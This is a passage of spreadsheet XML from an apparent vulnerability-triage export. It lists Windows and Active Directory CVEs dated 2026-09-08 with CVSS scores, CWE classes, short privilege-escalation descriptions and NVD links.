      <c r="D2129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2129" s="5" t="inlineStr"/>
      <c r="F2129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2129" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2129" s="5" t="inlineStr"/>
      <c r="I2129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2129" s="5" t="inlineStr"/>
      <c r="K2129" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2129" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t>
        </is>
      </c>
    </row>
    <row r="2130">
      <c r="A2130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69284</t>
        </is>
      </c>
      <c r="C2130" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2130" s="5" t="inlineStr"/>
      <c r="F2130" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2130" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2130" s="5" t="inlineStr"/>
      <c r="I2130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2130" s="5" t="inlineStr"/>
      <c r="K2130" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2130" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t>
        </is>
      </c>
    </row>
    <row r="2131">
      <c r="A2131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69289</t>
        </is>
      </c>
      <c r="C2131" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2131" s="5" t="inlineStr"/>
      <c r="F2131" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2131" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2131" s="5" t="inlineStr"/>
      <c r="I2131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2131" s="5" t="inlineStr"/>
      <c r="K2131" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2131" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t>
        </is>
      </c>
    </row>
    <row r="2132">
      <c r="A2132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69290</t>
        </is>
      </c>
      <c r="C2132" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2132" s="5" t="inlineStr"/>
      <c r="F2132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2132" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2132" s="5" t="inlineStr"/>
      <c r="I2132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2132" s="5" t="inlineStr"/>
      <c r="K2132" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2132" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t>
        </is>
      </c>
    </row>
    <row r="2133">
      <c r="A2133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="C2133" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2133" s="5" t="inlineStr"/>
      <c r="F2133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2133" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2133" s="5" t="inlineStr"/>
      <c r="I2133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2133" s="5" t="inlineStr"/>
      <c r="K2133" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2133" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="2134">
      <c r="A2134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="C2134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2134" s="5" t="inlineStr"/>
      <c r="F2134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2134" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2134" s="5" t="inlineStr"/>
      <c r="I2134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2134" s="5" t="inlineStr"/>
      <c r="K2134" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L2134" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="2135">
      <c r="A2135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="C2135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2135" s="5" t="inlineStr"/>
      <c r="F2135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2135" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H21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135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2135" s="5" t="inlineStr"/>
      <c r="K2135" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2135" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="2136">
      <c r="A2136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="C2136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2136" s="5" t="inlineStr"/>
      <c r="F2136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2136" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2136" s="5" t="inlineStr"/>
      <c r="I2136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2136" s="5" t="inlineStr"/>
      <c r="K2136" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2136" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="2137">
      <c r="A2137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="C2137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2137" s="5" t="inlineStr"/>
      <c r="F2137" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2137" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2137" s="5" t="inlineStr"/>
      <c r="I2137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2137" s="5" t="inlineStr"/>
      <c r="K2137" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2137" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="2138">
      <c r="A2138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="C2138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2138" s="5" t="inlineStr"/>
      <c r="F2138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2138" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H213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138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2138" s="5" t="inlineStr"/>
      <c r="K2138" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2138" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="2139">
      <c r="A2139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69324</t>
        </is>
      </c>
      <c r="C2139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2139" s="5" t="inlineStr"/>
      <c r="F2139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2139" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2139" s="5" t="inlineStr"/>
      <c r="I2139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2139" s="5" t="inlineStr"/>
      <c r="K2139" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L2139" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t>
        </is>
      </c>
    </row>
    <row r="2140">
      <c r="A2140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69328</t>
        </is>
      </c>
      <c r="C2140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2140" s="5" t="inlineStr"/>
      <c r="F2140" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2140" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2140" s="5" t="inlineStr"/>
      <c r="I2140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2140" s="5" t="inlineStr"/>
      <c r="K2140" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2140" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t>
        </is>
      </c>
    </row>
    <row r="2141">
      <c r="A2141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="C2141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2141" s="5" t="inlineStr"/>
      <c r="F2141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2141" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2141" s="5" t="inlineStr"/>
      <c r="I2141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2141" s="5" t="inlineStr"/>
      <c r="K2141" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2141" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="2142">
      <c r="A2142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="C2142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2142" s="5" t="inlineStr"/>
      <c r="F2142" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2142" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2142" s="5" t="inlineStr"/>
      <c r="I2142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2142" s="5" t="inlineStr"/>
      <c r="K2142" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2142" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="2143">
      <c r="A2143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69359</t>
        </is>
      </c>
      <c r="C2143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2143" s="5" t="inlineStr"/>
      <c r="F2143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2143" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2143" s="5" t="inlineStr"/>
      <c r="I2143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2143" s="5" t="inlineStr"/>
      <c r="K2143" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2143" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t>
        </is>
      </c>
    </row>
    <row r="2144">
      <c r="A2144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69368</t>
        </is>
      </c>
      <c r="C2144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2144" s="5" t="inlineStr"/>
      <c r="F2144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2144" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2144" s="5" t="inlineStr"/>
      <c r="I2144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2144" s="5" t="inlineStr"/>
      <c r="K2144" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2144" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t>
        </is>
      </c>
    </row>
    <row r="2145">
      <c r="A2145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69377</t>
        </is>
      </c>
      <c r="C2145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2145" s="5" t="inlineStr"/>
      <c r="F2145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2145" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2145" s="5" t="inlineStr"/>
      <c r="I2145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2145" s="5" t="inlineStr"/>
      <c r="K2145" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2145" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t>
        </is>
      </c>
    </row>
    <row r="2146">
      <c r="A2146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69389</t>
        </is>
      </c>
      <c r="C2146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2146" s="5" t="inlineStr"/>
      <c r="F2146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2146" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2146" s="5" t="inlineStr"/>
      <c r="I2146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2146" s="5" t="inlineStr"/>
      <c r="K2146" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2146" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t>
        </is>
      </c>
    </row>
    <row r="2147">
      <c r="A2147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="C2147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2147" s="5" t="inlineStr"/>
      <c r="F2147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2147" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2147" s="5" t="inlineStr"/>
      <c r="I2147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2147" s="5" t="inlineStr"/>
      <c r="K2147" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2147" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="2148">
      <c r="A2148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69392</t>
        </is>
      </c>
      <c r="C2148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2148" s="5" t="inlineStr"/>
      <c r="F2148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2148" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2148" s="5" t="inlineStr"/>
      <c r="I2148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2148" s="5" t="inlineStr"/>
      <c r="K2148" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2148" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t>
        </is>
      </c>
    </row>
    <row r="2149">
      <c r="A2149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69407</t>
        </is>
      </c>
      <c r="C2149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2149" s="5" t="inlineStr"/>
      <c r="F2149" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2149" s="5" t="inlineStr"/>
      <c r="H2149" s="5" t="inlineStr"/>
      <c r="I2149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2149" s="5" t="inlineStr"/>
      <c r="K2149" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2149" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t>
        </is>
      </c>
    </row>
    <row r="2150">
      <c r="A2150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69420</t>
        </is>
      </c>
      <c r="C2150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2150" s="5" t="inlineStr"/>
      <c r="F2150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2150" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2150" s="5" t="inlineStr"/>
      <c r="I2150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2150" s="5" t="inlineStr"/>
      <c r="K2150" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2150" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t>
        </is>
      </c>
    </row>
    <row r="2151">
      <c r="A2151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="C2151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2151" s="5" t="inlineStr"/>
      <c r="F2151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2151" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2151" s="5" t="inlineStr"/>
      <c r="I2151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2151" s="5" t="inlineStr"/>
      <c r="K2151" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L2151" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="2152">
      <c r="A2152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69424</t>
        </is>
      </c>
      <c r="C2152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2152" s="5" t="inlineStr"/>
      <c r="F2152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2152" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2152" s="5" t="inlineStr"/>
      <c r="I2152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2152" s="5" t="inlineStr"/>
      <c r="K2152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2152" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t>
        </is>
      </c>
    </row>
    <row r="2153">
      <c r="A2153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="C2153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2153" s="5" t="inlineStr"/>
      <c r="F2153" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2153" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2153" s="5" t="inlineStr"/>
      <c r="I2153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
